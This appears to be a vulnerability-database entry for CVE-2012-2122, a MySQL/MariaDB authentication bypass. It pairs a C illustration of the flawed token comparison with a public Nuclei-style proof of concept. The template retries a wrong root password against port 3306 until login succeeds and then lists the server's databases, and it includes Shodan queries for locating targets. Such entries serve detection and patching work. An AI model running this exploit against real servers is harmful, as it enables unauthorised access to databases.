CVE-2012-2122: MySQL - Authentication Bypass

Date: 2025-08-01 | Affected software: MySQL | PoC: public

Vulnerability description

sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
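The improperly-checked return value behind this CVE, as an added C illustration written for this page (not MySQL's own sql/password.c): wide_memcmp is a constructed stand-in for an optimized memcmp that may return any non-zero int, and the two check functions contrast the vulnerable narrowing of that int to my_bool with the patched form.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed illustration of the CVE-2012-2122 mechanism, not MySQL's source.
 * MySQL's check_scramble() returned memcmp()'s int through my_bool (a char),
 * so any mismatch whose low 8 bits were zero narrowed to 0, i.e. "match". */
typedef char my_bool;
#define SHA1_HASH_SIZE 20

/* Model of an optimized memcmp: compares 4-byte words and returns their
 * wrapped difference. Any non-zero int is a valid memcmp result, not just
 * -1/0/1. Assumes n is a multiple of 4 (SHA1_HASH_SIZE is). */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    for (size_t i = 0; i < n; i += 4) {
        uint32_t wa = ((uint32_t)a[i] << 24) | ((uint32_t)a[i + 1] << 16) |
                      ((uint32_t)a[i + 2] << 8) | a[i + 3];
        uint32_t wb = ((uint32_t)b[i] << 24) | ((uint32_t)b[i + 1] << 16) |
                      ((uint32_t)b[i + 2] << 8) | b[i + 3];
        if (wa != wb)
            return (int)(wa - wb); /* non-zero, but its low byte can be 0 */
    }
    return 0;
}

/* Vulnerable shape: the int is narrowed to char; 0 means "token matched". */
static my_bool check_scramble_vuln(const unsigned char *exp, const unsigned char *got)
{
    return wide_memcmp(exp, got, SHA1_HASH_SIZE);
}

/* Fixed shape, as in the upstream patch: normalise to 0/1 before narrowing. */
static my_bool check_scramble_fixed(const unsigned char *exp, const unsigned char *got)
{
    return wide_memcmp(exp, got, SHA1_HASH_SIZE) != 0;
}

/* Returns 1 if the chosen check accepts a token that differs from the
 * expected one only in byte `pos` (an authentication bypass), 0 if it
 * rejects it. Tokens are constructed all-zero for the demonstration. */
int accepts_mismatch_at(size_t pos, int use_fixed)
{
    unsigned char expected[SHA1_HASH_SIZE] = {0}, got[SHA1_HASH_SIZE] = {0};
    got[pos] ^= 0x01;                      /* one-byte mismatch */
    my_bool r = use_fixed ? check_scramble_fixed(expected, got)
                          : check_scramble_vuln(expected, got);
    return r == 0;
}
```

With the modelled memcmp, a mismatch in any byte other than the last of a word yields a difference whose low byte is zero, so the vulnerable check accepts it while the fixed check rejects it.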

PoC code [public]

id: CVE-2012-2122

info:
  name: MySQL - Authentication Bypass
  author: pussycat0x
  severity: medium
  description: |
    sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
    - http://kb.askmonty.org/en/mariadb-5162-release-notes/
    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
    - http://security.gentoo.org/glsa/glsa-201308-06.xml
    - http://securitytracker.com/id?1027143
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
    cvss-score: 5.1
    cve-id: CVE-2012-2122
    cwe-id: CWE-287
    epss-score: 0.9407
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: mysql
    shodan-query:
      - "product:\"MySQL\""
      - product:"mysql"
  tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const mysql = require('nuclei/mysql');
      const client = new mysql.MySQLClient();
      // Retry the same wrong password; against a vulnerable memcmp build the
      // truncated token comparison eventually succeeds (about 1 in 256 tries).
      for (let i = 1; i <= 1001; i++) {
        try {
          const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
          Export(connected);
          break;
        } catch (e) {
          // authentication failed as expected on this attempt; try again
        }
      }

    args:
      Host: "{{Host}}"
      Port: 3306
      User: "root"
      Pass: "wrong"
      Query: "show databases;"

    matchers:
      - type: dsl
        dsl:
          - "success == true"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 4b0a00483046022100d2decbf033fb9ff262e8e5fb17ebb2b51091fb6d8257a3b100cf72aa9043c0460221009bd2ad29790a2dadbd1bc69457510dab5547a1fe6b125ed8390646df047c8f80:922c64590222798bb761d5b6d8e72950
